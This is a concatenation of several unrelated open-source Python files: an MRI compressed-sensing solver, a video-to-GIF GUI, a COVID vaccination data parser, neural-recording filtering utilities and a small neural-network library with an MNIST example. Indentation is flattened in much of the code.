x1 = xx[~array.mask]
y1 = yy[~array.mask]
newarr = array[~array.mask]
y = interpolate.griddata((x1, y1), newarr.ravel(),
(xx, yy),
method='linear')
return y.reshape((-1,1))
# Parameters
# ----------
import k_space
import radial
brain= np.array(Image.open('data/head256.png').convert('L').resize((256,256)))/255
idx=radial.radial2D(40,brain.shape)
#print(type(idx))
A=lambda x: k_space.k_space_sampling(x,brain.shape,idx)
At=lambda x: k_space.adjoint(x,brain.shape,idx)
b=A(brain)
x0=At(b).reshape(brain.shape).real
pattern=np.random.permutation(brain.size)
U=lambda x: wd.WavDec(x,brain.shape,decLevel=3,family='haar',randperm=pattern)
Ut=lambda x: wd.WavRec(x,brain.shape,decLevel=3,family='haar',randperm=pattern)
xw=np.reshape(U(brain),brain.shape)
import time
t=time.time()
xrtv=IAFNNESTA.IAFNNESTA(b,A=A,At=At,H='tv',sig_size=brain.shape,verbose=0,maxit=1000).real
print(time.time()-t)
t=time.time()
xrwav=IAFNNESTA.IAFNNESTA(b,A=A,At=At,U=U,Ut=Ut,sig_size=brain.shape,verbose=0,maxit=1000).real
print(time.time()-t)
t=time.time()
xrwav_as_h=IAFNNesterov.IAFNNesterov(b,A=A,At=At,H=U,Ht=Ut,verbose=0,maxit=1000)[0].real.reshape(brain.shape)
print(time.time()-t)
plt.title('MRI wavelet demo: tv - L1 wavelet - L1 wavelet as H')
plt.imshow(np.hstack((x0,xrtv,xrwav,xrwav_as_h)),cmap='gray')
plt.savefig('demo_wavelet.png')
plt.show()
```
#### File: JonathanAlis/IAFNNESTA/IAFNNESTA.py
```python
def help():
return '''
Isotropic-Anisotropic Filtering Norm Nesterov Algorithm
Solves the filtering norm minimization + quadratic term problem
Nesterov algorithm, with continuation:
argmin_x || iaFN(x) ||_1/2 subjected to ||b - Ax||_2^2 < delta
If no filter is provided, solves the L1.
Continuation is performed by sequentially applying Nesterov's algorithm
with a decreasing sequence of values of mu0 >= mu >= muf
The observation matrix A must be a projector (non projector not implemented yet)
Inputs:
IAFNNESTA(b, #Observed data, a m x 1 array
A=identity,At=identity, # measurement matrix and adjoint (either a matrix, function handles)
muf=0.0001, #final mu value, smaller leads to higher accuracy
delta, #l2 error bound. This enforces how close the variable
#must fit the observations b, i.e. || y - Ax ||_2 <= delta
#If delta = 0, enforces y = Ax
#delta = sqrt(m + 2*sqrt(2*m))*sigma, where sigma=std(noise).
L1w=1,L2w=0, #weights of L1 (anisotropic) and L2(isotropic) norms
verbose=0, #whether to print internal steps
maxit=1000, #maximum iterations at the inner loop
x0=[], #initial solution, if not provided, will be At(b)
U=identity,Ut=identity, #Analysis/Synthesis operators
stopTest=1, #stopTest == 1 : stop when the relative change in the objective
function is less than TolVar
stopTest == 2 : stop with the l_infinity norm of difference in
the xk variable is less than TolVar
TolVar = 1e-5, #tolerance for the stopping criteria
AAtinv=[], #not implemented
normU=1, #if U is provided, this should be norm(U)
H=[],Ht=[]): #filter operations in sparse matrix form
#also accepts the string 'tv' as input,
#in that case, calculates the tv norm
Outputs:
return xk, #estimated x reconstructed signal
niter, #number of iterations
residuals #first column is the residual at every step,
#second column is the value of f_mu at every step
'''
import IAFNNesterov
import numpy as np
from scipy import sparse
import fil2mat
def identity(x):
return x
def IAFNNESTA(b,sig_size=0,A=identity,At=identity,muf=0.0001,delta=0,L1w=1,L2w=0,verbose=0,MaxIntIter=5,maxit=1000,x0=[],U=identity,Ut=identity,stopTest=1,TolVar = 1e-5,AAtinv=[],normU=1,H=[]):
if delta<0:
raise Exception('Delta must not be negative')
    if not callable(A): #If not a function handle, wrap the matrix in function handles
        A_mat = A
        A = lambda x: np.matmul(A_mat, x)
        At = lambda x: np.matmul(np.transpose(A_mat), x)
b=b.reshape((-1,1))
Atb=At(b)
if sig_size==0:
sig_size=Atb.shape
if callable(AAtinv):
AtAAtb = At( AAtinv(b) )
else:
        if len(AAtinv)>0:
            AAtinv_mat = AAtinv
            AAtinv = lambda x: np.matmul(AAtinv_mat, x)
            AtAAtb = At( AAtinv(b) )
else: #default
AtAAtb = Atb
AAtinv=identity
if len(x0)==0:
x0 = AtAAtb
if len(H)==0:
Hf=identity
Hft=identity
else:
if not sparse.issparse(H):
if isinstance(H, str):
if H=='tv':
hs=[]
hs.append(np.array([[1,-1]]))
hs.append(np.array([[1],[-1]]))
H,_,_,_=fil2mat.fil2mat(hs,sig_size)
else:
print('H not recognized. Must be a sparse matrix, a list of filters or the string tv')
else:
#list of filters:
H,_,_,_=fil2mat.fil2mat(H,sig_size)
#print(H.shape)
#print(H)
#print(type(H))
Ht=H.transpose()
Hf=lambda x: H@x
Hft=lambda x: Ht@x
HU=lambda x: Hf(U(x))
UtHt=lambda x: Ut(Hft(x))
typemin=''
if L1w>0:
typemin+="iso"
if L2w>0:
typemin+="aniso"
typemin+='tropic '
if callable(H):
typemin+='filtering norm '
mu0=0
if L1w>0:
mu0+=L1w*0.9*np.max(np.linalg.norm(HU(x0),1))
if L2w>0:
mu0+=L2w*0.9*np.max(np.linalg.norm(HU(x0),2))
niter = 0
Gamma = np.power(muf/mu0,1/MaxIntIter)
mu = mu0
Gammat= np.power(TolVar/0.1,1/MaxIntIter)
TolVar = 0.1
for i in range(MaxIntIter):
mu = mu*Gamma
        TolVar = TolVar*Gammat
if verbose>0:
#if k%verbose==0:
print("\tBeginning %s Minimization; mu = %g\n" %(typemin,mu))
xk,niter_int,res = IAFNNesterov.IAFNNesterov(b,A=A,At=At,mu=mu,delta=delta,L1w=L1w,L2w=L2w,verbose=verbose,maxit=maxit,x0=x0,U=U,Ut=Ut,stopTest=stopTest,TolVar = TolVar,AAtinv=AAtinv,normU=normU,H=Hf,Ht=Hft)
xplug = xk
niter = niter_int + niter
if i==0:
residuals=res
else:
residuals = np.vstack((residuals, res))
return xk.reshape(sig_size)
if __name__ == "__main__":
print(help())
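
# Minimal usage sketch (illustrative; `b`, `A`, `At` and `x_true` are assumed to be the
# observed data, the measurement operator, its adjoint and the original signal, as in
# demo_wavelet.py):
#
#   x_rec = IAFNNESTA(b, A=A, At=At, H='tv', sig_size=x_true.shape, maxit=1000)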
``` |
{
"source": "JonathanAlis/video2gif",
"score": 3
} |
#### File: JonathanAlis/video2gif/video2gif.py
```python
import PySimpleGUI as sg
import os.path
from moviepy.editor import *
import cv2
import time
# First the window layout in 2 columns
INITIAL_HEIGHT = 240
transforms = [
[
sg.Text("Select a video:"),
sg.In(size=(25, 1), enable_events=True, key="-VIDEO-SELECTED-"),
sg.FilesBrowse(file_types=[("Video Files", "*.mp4")]),
sg.Button("Load/Reload Video")
],
[ sg.Text("Height:"),
sg.Slider(range = (30, 600), resolution=1, tick_interval=50, enable_events = True, orientation= 'horizontal',size=(50,30), key='scale_slider'),
],
[ sg.Text("Start:"),
sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='start_slider'),
],
[ sg.Text("Ending:"),
sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='end_slider'),
],
# TODO: change speed
# [ sg.Text("Speed:"),
# sg.Slider(range = (0.25, 4), resolution=0.25, tick_interval=10, enable_events = True, orientation= #'horizontal',size=(50,30), key='end_slider'),
# ],
[sg.Text("Cut video:"), sg.Button("Cut inside") , sg.Button("Cut outside")],
[sg.Button("Flip x"), sg.Button("Flip y"), sg.Button("Rotate 90"), sg.Button("Rotate -90")],
# TODO: select a rectangle
# [sg.Text("Select retangle:"), sg.Button("Retangle", disabled=True)],
[sg.Button("Undo",disabled=True), sg.Button("Redo",disabled=True)],
]
# For now will only show the name of the file that was chosen
image_viewer_column = [
[sg.Text(size=(40, 1), key="-TOUT-")],
[sg.Image(key="-IMAGE-")],
[sg.Slider(range = (0, 10), resolution=1, tick_interval=10, enable_events = True, orientation= 'horizontal',size=(50,30), key='trackbar')],
[sg.Button("Play"),
#sg.Button("Pause"),
sg.Button("Stop"),
sg.In(size=(25, 1), enable_events=True, visible=False, key="Save GIF"),
sg.FileSaveAs(button_text = "Save GIF", initial_folder='./', file_types = (('GIF', '*.gif'),)),
sg.In(size=(25, 1), enable_events=True, visible=False, key="Save PNG"),
sg.FileSaveAs(button_text = "Save PNG", initial_folder='./', file_types = (('PNG', '*.png'),))
]
]
# ----- Full layout -----
layout = [
[
sg.Column(transforms),
sg.VSeperator(),
sg.Column(image_viewer_column),
]
]
def image_2_bytes(image):
return cv2.imencode('.png', image[...,::-1])[1].tobytes()
def clip_image(clip,time):
image=clip.get_frame(time)
return cv2.imencode('.png', image[...,::-1])[1].tobytes()
window = sg.Window("Video to GIF", layout, return_keyboard_events=True, )
'''
window.bind("<Control-KeyPress-z>", "CTRL-Z")
window.bind("<Control-KeyPress-Z>", "CTRL-Z")
window.bind("<Control-KeyRelease-z>", "Release-Z")
window.bind("<Control-KeyRelease-Z>", "Release-Z")
window.bind("<Control-KeyPress-y>", "CTRL-Y")
window.bind("<Control-KeyPress-Y>", "CTRL-Y")
window.bind("<Control-KeyRelease-y>", "Release-Y")
window.bind("<Control-KeyRelease-Y>", "Release-Y")
ctrl_z_on = False
ctrl_y_on = False
'''
class Gif:
def __init__(self, file):
self.fullclip = VideoFileClip(file)
self.original_shape=self.fullclip.get_frame(0).shape
self.init_clip()
self.is_video_loaded=True
self.transforms=[]
self.transform_index=0
self.current_time=0
def init_clip(self):
self.clip=self.fullclip.copy()
if self.original_shape[0]>INITIAL_HEIGHT:
self.clip=self.clip.resize(height=INITIAL_HEIGHT)
self.image = self.clip.get_frame(0)
self.current_shape=self.image.shape
self.dur = self.clip.duration
self.fps=self.clip.fps
self.play_range=(0,self.dur)
def save_gif(self,filename):
if filename:
print('saving:', filename)
self.clip.write_gif(filename)
try:
from pygifsicle import optimize
optimize(filename)
except:
                raise Warning('Error in pygifsicle, not optimizing gif.')
def save_png(self,filename):
if filename:
print('saving:', filename)
self.clip.save_frame(filename, self.current_time)
def change_scale(self,value, release=None):
transform=('scale change',value)
if len(self.transforms)>0 and self.transforms[-1][0] == 'scale change': #only save last change
self.transforms[-1]=transform
else:
self.add_transform(transform)
self.apply_transform(transform)
self.current_shape=self.clip.get_frame(self.current_time).shape
#self.image=self.clip.get_frame(self.current_time)
def cut(self,start, end, inside=True):
if inside:
transform = ('cut inside',start, end)
else:
transform = ('cut outside',start, end)
self.apply_transform(transform)
self.add_transform(transform)
def flip(self,axis = 'x'):
transform = ('flip',axis)
self.apply_transform(transform)
self.add_transform(transform)
def rotate(self, positive = True):
if positive:
transform = ('rotate','90')
else:
transform = ('rotate','-90')
self.apply_transform(transform)
self.add_transform(transform)
def add_transform(self,transform):
self.transforms=self.transforms[0:self.transform_index]
self.transforms.append(transform)
self.transform_index+=1
        print('TRANSFORM INDEX:', self.transform_index, self.transforms)
def apply_transform(self,t):
if t[0]=='flip':
if t[1]=='x':
self.clip = self.clip.fx( vfx.mirror_x)
elif t[1]=='y':
self.clip = self.clip.fx( vfx.mirror_y)
else:
                raise ValueError('Invalid transform')
elif t[0]=='rotate':
if t[1]=='90':
self.clip = self.clip.rotate(90)
elif t[1]=='-90':
                self.clip = self.clip.rotate(-90)
else:
                raise ValueError('Invalid transform')
elif t[0] == 'scale change':
self.clip=self.fullclip.resize(height=t[1])
elif t[0] == 'cut inside':
self.clip=self.clip.subclip(t[1], t[2])
self.dur = self.clip.duration
self.play_range=(0,self.dur)
elif t[0] == 'cut outside':
clip1=self.clip.subclip(0, t[1])
clip2=self.clip.subclip(t[2], self.clip.duration)
self.clip=concatenate_videoclips([clip1,clip2], method='compose')
self.dur = self.clip.duration
self.play_range=(0,self.dur)
def apply_transform_list(self):
#clip=fullclip.copy()
self.init_clip()
if len(self.transforms)<=0:
return
# the only scaling applied is the last one
scale_change_indexes=[loc for loc, t in enumerate(self.transforms) if t[0] == 'scale change']
if len(scale_change_indexes)>0:
last_scale_index = max(scale_change_indexes)
self.apply_transform(self.transforms[last_scale_index])
else:
self.init_clip()
trans = [t for t in self.transforms[0:self.transform_index] if t[0] != 'scale change']
print(trans)
for t in trans:
print(t)
self.apply_transform(t)
def undo(self):
self.transform_index=max(self.transform_index-1,0)
self.apply_transform_list()
        print('TRANSFORM INDEX:', self.transform_index, self.transforms)
def redo(self):
self.transform_index=min(self.transform_index+1,len(self.transforms))
self.apply_transform_list()
        print('TRANSFORM INDEX:', self.transform_index, self.transforms)
def display(self):
return clip_image(self.clip,self.current_time)
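
# Minimal usage sketch (illustrative; 'input.mp4' and 'output.gif' are placeholder paths):
#
#   gif = Gif('input.mp4')
#   gif.cut(1.0, 3.5, inside=True)
#   gif.save_gif('output.gif')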
def update_bars(gif, window):
window.Element("scale_slider").Update(range=(30,gif.original_shape[0]), value=0)
window["scale_slider"].update(value=gif.current_shape[0])
window.Element("start_slider").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["start_slider"].update(value=0)
window.Element("end_slider").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["end_slider"].update(value=gif.dur)
window.Element("trackbar").Update(range=(0,gif.dur), value=0)#, tick_interval=dur/10)
window["trackbar"].update(value=0)
window["-IMAGE-"].update(gif.display())
playing = False
paused=False
play_time = 0.0
play_start_time = 0.0
is_video_loaded=False
square=(0,0,0,0)
#list of tuples
transforms=[]
transform_index=0
# Run the Event Loop
while True:
# Timeout set only when playing the video.
if not playing:
event, values = window.read()
else:
if is_video_loaded:
event, values = window.read(timeout = 1000/gif.fps)
if event == "Exit" or event == sg.WIN_CLOSED:
break
# Load video
if event == "Load/Reload Video" and values["-VIDEO-SELECTED-"].endswith('.mp4'):
playing=False
window['Play'].update('Play')
file = values["-VIDEO-SELECTED-"]
try:
gif=Gif(file)
is_video_loaded=gif.is_video_loaded
        except Exception as err:
            print("Error loading the file:", err)
            break
update_bars(gif,window)
elif event == 'Save GIF' and is_video_loaded:
filename = values['Save GIF']
gif.save_gif(filename)
elif event == 'Save PNG' and is_video_loaded:
filename = values['Save PNG']
gif.save_png(filename)
# change scale
elif event == "scale_slider" and is_video_loaded:
gif.change_scale(values['scale_slider'])
window["-IMAGE-"].update(gif.display())
elif event == "start_slider" and is_video_loaded:
playing=False
window['Play'].update('Play')
gif.current_time=values['start_slider']
gif.play_range=(gif.current_time,values['end_slider'])
if gif.current_time > values["end_slider"]:
window["end_slider"].update(value=gif.current_time)
window["-IMAGE-"].update(gif.display())
elif event == "end_slider" and is_video_loaded:
playing=False
window['Play'].update('Play')
gif.current_time=values['end_slider']
gif.play_range=(values['start_slider'],gif.current_time)
if gif.current_time < values["start_slider"]:
window["start_slider"].update(value=gif.current_time)
window["-IMAGE-"].update(gif.display())
elif event == "trackbar" and is_video_loaded:
gif.current_time=values['trackbar']
window["-IMAGE-"].update(gif.display())
if playing:
playing=False
window['Play'].update('Play')
elif event == 'Cut inside' and is_video_loaded:
gif.cut(values['start_slider'],values['end_slider'], inside=True)
update_bars(gif, window)
elif event == 'Cut outside' and is_video_loaded:
gif.cut(values['start_slider'],values['end_slider'], inside=False)
update_bars(gif, window)
elif event == 'Flip x' and is_video_loaded:
gif.flip(axis = 'x')
window["-IMAGE-"].update(gif.display())
elif event == 'Flip y' and is_video_loaded:
gif.flip(axis = 'y')
window["-IMAGE-"].update(gif.display())
elif event == 'Rotate 90' and is_video_loaded:
gif.rotate(positive=True)
window["-IMAGE-"].update(gif.display())
elif event == 'Rotate -90' and is_video_loaded:
gif.rotate(positive=False)
window["-IMAGE-"].update(gif.display())
# TODO: solve to correctly disable undo button
elif event == 'Undo' and gif.transform_index > 0 and is_video_loaded:
#window['Undo'].update(disabled = (transform_index == 0) )
#window['Redo'].update(disabled = (transform_index == len(transforms)-1) or len(transforms) == 0)
gif.undo()
update_bars(gif, window)
window["-IMAGE-"].update(gif.display())
elif event == 'Redo' and gif.transform_index < len(gif.transforms) and is_video_loaded:
#window['Undo'].update(disabled = (transform_index == 0) )
#window['Redo'].update(disabled = (transform_index == len(transforms)-1) or len(transforms) == 0)
gif.redo()
gif.display()
update_bars(gif, window)
window["-IMAGE-"].update(gif.display())
elif event == 'Play' and is_video_loaded:
if playing:
window['Play'].update('Play')
playing=False
else:
window['Play'].update('Pause')
playing=True
play_time=time.time()
play_start_time=values['trackbar']
paused=False
elif event == 'Stop' and is_video_loaded:
window['Play'].update('Play')
playing=False
window["-IMAGE-"].update(gif.display())
window["trackbar"].update(0)
#print(event,values)
if not event=='__TIMEOUT__' and is_video_loaded:
window['Undo'].update(disabled = (gif.transform_index == 0) )
window['Redo'].update(disabled = (gif.transform_index >= len(gif.transforms)))
''' TODO: control Z
elif (event == "CTRL-B" and not ctrl_z_on):
ctrl_z_on == True
elif event == "Release-B":
ctrl_z_on = False
'''
''' TODO: pause button
elif event == 'Pause':
if playing:
playing=False
paused=True
if paused:
playing=True
paused=False
'''
#play the video
if is_video_loaded and playing:
trackbar_time=(time.time()-play_time)+play_start_time
if trackbar_time < gif.play_range[1]:
window["trackbar"].update(value=trackbar_time)
window["-IMAGE-"].update(gif.display())
gif.current_time=trackbar_time
else:
playing=False
window['Play'].update('Play')
#window['Pause'].update(disabled=paused)
#print(transforms)
window.close()
``` |
{
"source": "jonathanamar-v/covid-19-open-data",
"score": 2
} |
#### File: pipelines/vaccinations/in_covid19india_org.py
```python
from typing import Dict
from pandas import DataFrame, melt
from lib.data_source import DataSource
from lib.time import datetime_isoformat
from lib.utils import table_merge
from lib.metadata_utils import country_subregion1s
class Covid19IndiaOrgL1DataSource(DataSource):
def parse_dataframes(
self, dataframes: Dict[str, DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
data = dataframes[0]
# Flatten the table
data = melt(data, id_vars=["State"], var_name="date", value_name='total_vaccine_doses_administered')
data.date = data.date.apply(lambda x: datetime_isoformat(x, "%d/%m/%Y"))
# add location keys
subregion1s = country_subregion1s(aux["metadata"], "IN")
data = table_merge(
[data, subregion1s[['key', 'subregion1_name']]],
left_on="State", right_on='subregion1_name', how="inner")
return data
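# A rough illustration of the reshaping above (toy values, not the real source schema):
# a wide table such as
#   State      01/05/2021  02/05/2021
#   Karnataka  100         150
# becomes, after melt() and the date conversion,
#   State      date        total_vaccine_doses_administered
#   Karnataka  2021-05-01  100
#   Karnataka  2021-05-02  150
# and the inner merge then attaches the matching `key` for each subregion1_name.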
``` |
{
"source": "JonathanAMichaels/NeuropixelsRegistration",
"score": 2
} |
#### File: NeuropixelsRegistration/python/utils.py
```python
import numpy as np
from scipy.io import loadmat
import os
import logging
from scipy.signal import butter, filtfilt
def mat2npy(mat_chanmap_dir):
mat_chanmap = loadmat(mat_chanmap_dir)
x = mat_chanmap['xcoords']
y = mat_chanmap['ycoords']
npy_chanmap = np.hstack([x,y])
#np.save('chanmap.npy', npy_chanmap) # you can't just go saving this wherever
return npy_chanmap
def merge_filtered_files(filtered_location, output_directory, delete=True):
filenames = os.listdir(filtered_location)
filenames_sorted = sorted(filenames)
f_out = os.path.join(output_directory, "standardized.bin")
f = open(f_out, 'wb')
for fname in filenames_sorted:
if '.ipynb' in fname or 'standardized' in fname:
continue
res = np.load(os.path.join(filtered_location, fname)).astype('int16') # was float32
res.tofile(f)
if delete:
os.remove(os.path.join(filtered_location, fname))
# Added functions from yass to avoid mandatory yass install
"""
Filtering functions
"""
def _butterworth(ts, low_frequency, high_factor, order, sampling_frequency):
"""Butterworth filter
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
        If a multidimensional array is passed
"""
low = float(low_frequency) / sampling_frequency * 2
high = float(high_factor) * 2
b, a = butter(order, low, btype='high', analog=False)
if ts.ndim == 1:
return filtfilt(b, a, ts)
else:
T, C = ts.shape
output = np.zeros((T, C), 'float32')
for c in range(C):
output[:, c] = filtfilt(b, a, ts[:, c])
return output
def _mean_standard_deviation(rec, centered=False):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
centered : bool
if not standardized, center it
Returns
-------
sd : vector [number of channels]
standard deviation in each channel
"""
# find standard deviation using robust method
if not centered:
centers = np.mean(rec, axis=0)
rec = rec - centers[None]
else:
centers = np.zeros(rec.shape[1], 'float32')
return np.median(np.abs(rec), 0) / 0.6745, centers
def _standardize(rec, sd=None, centers=None):
"""Determine standard deviation of noise in each channel
Parameters
----------
rec : matrix [length of recording, number of channels]
recording
    sd : vector [number of channels,]
standard deviation
centered : bool
if not standardized, center it
Returns
-------
matrix [length of recording, number of channels]
standardized recording
"""
# find standard deviation using robust method
if (sd is None) or (centers is None):
sd, centers = _mean_standard_deviation(rec, centered=False)
# standardize all channels with SD> 0.1 (Voltage?) units
# Cat: TODO: ensure that this is actually correct for all types of channels
idx1 = np.where(sd >= 0.1)[0]
rec[:, idx1] = np.divide(rec[:, idx1] - centers[idx1][None], sd[idx1])
# zero out bad channels
idx2 = np.where(sd < 0.1)[0]
rec[:, idx2] = 0.
return rec
# return np.divide(rec, sd)
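# A small usage sketch (illustrative only): for a (T, C) recording `rec`, the two
# helpers above are typically chained as
#
#   sd, centers = _mean_standard_deviation(rec, centered=False)
#   rec_std = _standardize(rec, sd, centers)
#
# The robust scale estimate median(|x - mean|) / 0.6745 approximates the standard
# deviation of Gaussian noise while staying insensitive to large spikes in the trace.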
def filter_standardize_batch(batch_id, reader, fname_mean_sd,
apply_filter, out_dtype, output_directory,
low_frequency=None, high_factor=None,
order=None, sampling_frequency=None):
"""Butterworth filter for a one dimensional time series
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
If a multidmensional array is passed
"""
logger = logging.getLogger(__name__)
# filter
if apply_filter:
# read a batch
ts = reader.read_data_batch(batch_id, add_buffer=True)
ts = _butterworth(ts, low_frequency, high_factor,
order, sampling_frequency)
ts = ts[reader.buffer:-reader.buffer]
else:
ts = reader.read_data_batch(batch_id, add_buffer=False)
# standardize
temp = np.load(fname_mean_sd)
sd = temp['sd']
centers = temp['centers']
ts = _standardize(ts, sd, centers)
# save
fname = os.path.join(
output_directory,
"standardized_{}.npy".format(
str(batch_id).zfill(6)))
np.save(fname, ts.astype(out_dtype))
# fname = os.path.join(
# output_directory,
# "standardized_{}.bin".format(
# str(batch_id).zfill(6)))
# f = open(fname, 'wb')
# f.write(ts.astype(out_dtype))
def get_std(ts,
sampling_frequency,
fname,
apply_filter=False,
low_frequency=None,
high_factor=None,
order=None):
"""Butterworth filter for a one dimensional time series
Parameters
----------
ts: np.array
T numpy array, where T is the number of time samples
low_frequency: int
Low pass frequency (Hz)
high_factor: float
High pass factor (proportion of sampling rate)
order: int
Order of Butterworth filter
sampling_frequency: int
Sampling frequency (Hz)
Notes
-----
This function can only be applied to a one dimensional array, to apply
it to multiple channels use butterworth
Raises
------
NotImplementedError
        If a multidimensional array is passed
"""
# filter
if apply_filter:
ts = _butterworth(ts, low_frequency, high_factor,
order, sampling_frequency)
# standardize
sd, centers = _mean_standard_deviation(ts)
# save
np.savez(fname,
centers=centers,
sd=sd)
``` |
{
"source": "Jonathan-Andrews/dlmb",
"score": 3
} |
#### File: dlmb/examples/mnist_example.py
```python
import os
import tensorflow as tf
import numpy as np
from models import Sequential
from layers import Dense, Batchnorm
def prepare_data():
# Get the data from tensorflow
# mnist is a data set of 60000 different 28*28 hand written digit images
# The hand written digits range from 0 - 9
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
# Set the shapes
# The data set originally comes in a (60000, 28, 28) sized array, where each 28 is either the rows or columns of the image
x_train = x_train.reshape((60000, 784))
x_test = x_test.reshape((10000, 784))
# Turn y_train into a one hot vector for softmax and crossentropy
# A one hot vector is a array filled with zeros except for a one in the index of the number in the array
# Example:
# [2, 4]
# 0 1 2 3 4 0 1 2 3 4
# [[0, 0, 1, 0, 0], [0, 0, 0, 0, 1]] (The first 0 in each array is the zeroth index)
y_train = np.eye(np.max(y_train) + 1)[y_train]
# Normalize X.
# We normalize the data to help the model learn better
# A pixel in the image has a value ranging from 0 - 255, so dividing by 255 normalizes the data between 0 and 1
x_train = x_train / 255
x_test = x_test / 255
return x_train, y_train, x_test, y_test
def validate_model(predictions, labels):
correct = 0
for i in range(len(predictions)):
guess = np.where(predictions[i] == np.max(predictions[i]))
if guess[0] == labels[i]: # Compare the models output to the correct output
correct += 1
return correct
def run():
file_path = os.path.dirname(os.path.realpath(__file__)) + "/dlmb_mnist_example.json"
# If a file of the neural-net model's architexture already exists,
# then there is no need to build a new model.
if os.path.isfile(file_path):
# load the model and get its predictions based on x_test
nn_model = Sequential()
nn_model.load(file_path)
predictions = nn_model.predict(x_test)
# compare the predictions to the correct labels
print(f"This model got a {validate_model(predictions, y_test)/100}% accuracy")
# If the file doesn't exist then we need to build a neural-net model and train it.
else:
# Build the neural-net model
nn_model = Sequential([
Dense(128, 784, activation="ReLU"), # for the layer_dim we want 128 outputs and 784 inputs (each pixel on the image)
Batchnorm(128),
Dense(128, 128, activation="ReLU"),
Batchnorm(128),
Dense(32, 128, activation="ReLU"),
Batchnorm(32),
Dense(10, 32, activation="Softmax") # We have 10 nodes in the layer for each number from 0 - 9
])
nn_model.build(loss="crossentropy", optimizer="adam")
# Crossentropy is a good loss function when you are doing logistic regression (classification)
# Adam is one of the most popular optimizers
nn_model.train(x_train, y_train, epochs=10, batch_size=1000)
# Train the model
# We go through the data 10 times and split the data of 60000 samples into 1000 sized batches leaving 60 samples
# Now we save the model so we can use it again without re-training
nn_model.save(file_path) # When saving, files must end in .json
x_train, y_train, x_test, y_test = prepare_data()
run()
```
#### File: dlmb/dlmb/initializers.py
```python
import numpy as np
from utils.function_helpers import *
@accepts(shape=tuple)
def zeros(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with values of 0.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A numpy array filled with values of 0.
"""
return np.zeros(shape)
@accepts(shape=tuple)
def ones(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with values of 1.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : Numpy array : A numpy array filled with values of 1.
"""
return np.ones(shape)
@accepts(shape=tuple)
def random(shape) -> np.ndarray:
"""
Creates a numpy array of shape shape filled with random values between 0 and 1.
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A numpy array filled with random values between 0 and 1.
"""
return np.random.random(shape)
@accepts(shape=tuple)
def uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array with boundaries of [-1/sqrt(n), 1/sqrt(n)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = 1/np.sqrt(shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def xavier(shape) -> np.ndarray:
"""
Creates a gaussian distribution numpy array with a mean of 0 and variance of sqrt(2/(n+m)).
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
return np.random.normal(0, np.sqrt(2/(shape[0]+shape[1])), shape)
@accepts(shape=tuple)
def xavier_uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array based of the xavier initializer with boundaries of [-sqrt(6)/sqrt(n+m), sqrt(6)/sqrt(n+m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = np.sqrt(6)/np.sqrt(shape[0]+shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def sigmoid_uniform(shape) -> np.ndarray:
"""
Creates a uniform numpy array based of the xavier_uniform initializer with boundaries of [-(4*sqrt(6))/sqrt(n+m), 4*sqrt(6)/sqrt(n+m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = 4*np.sqrt(6)/np.sqrt(shape[0]+shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
@accepts(shape=tuple)
def relu(shape) -> np.ndarray:
"""
Creates a gaussian distribution numpy array with a mean of 0 and variance of sqrt(2/m).
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
return np.random.normal(0, np.sqrt(2/shape[1]), shape)
@accepts(shape=tuple)
def relu_uniform(shape):
"""
Creates a uniform numpy array based of the relu initializer with boundaries of [-sqrt(6/m), sqrt(6/m)].
Arguments:
shape : tuple : A tuple with 2 numbers, specifying size of the numpy array.
Returns:
output : np.ndarray : A uniform numpy array.
"""
boundaries = np.sqrt(6/shape[1])
return np.random.uniform(-boundaries, boundaries, shape)
def get(initializer):
"""
Finds and returns the correct initializer function.
Arguments:
initializer : str/callable : The initializer function.
Returns:
initializer : callable : The correct initializer function.
"""
if type(initializer) == str:
if initializer.lower() in ("zeros", "zero"):
return zeros
elif initializer.lower() in ("ones", "one"):
return ones
elif initializer.lower() in ("random"):
return random
elif initializer.lower() in ("uniform"):
return uniform
elif initializer.lower() in ("xavier", "glorot"):
return xavier
elif initializer.lower() in ("xavier_uniform", "glorot_uniform"):
return xavier_uniform
elif initializer.lower() in ("sigmoid_uniform"):
return sigmoid_uniform
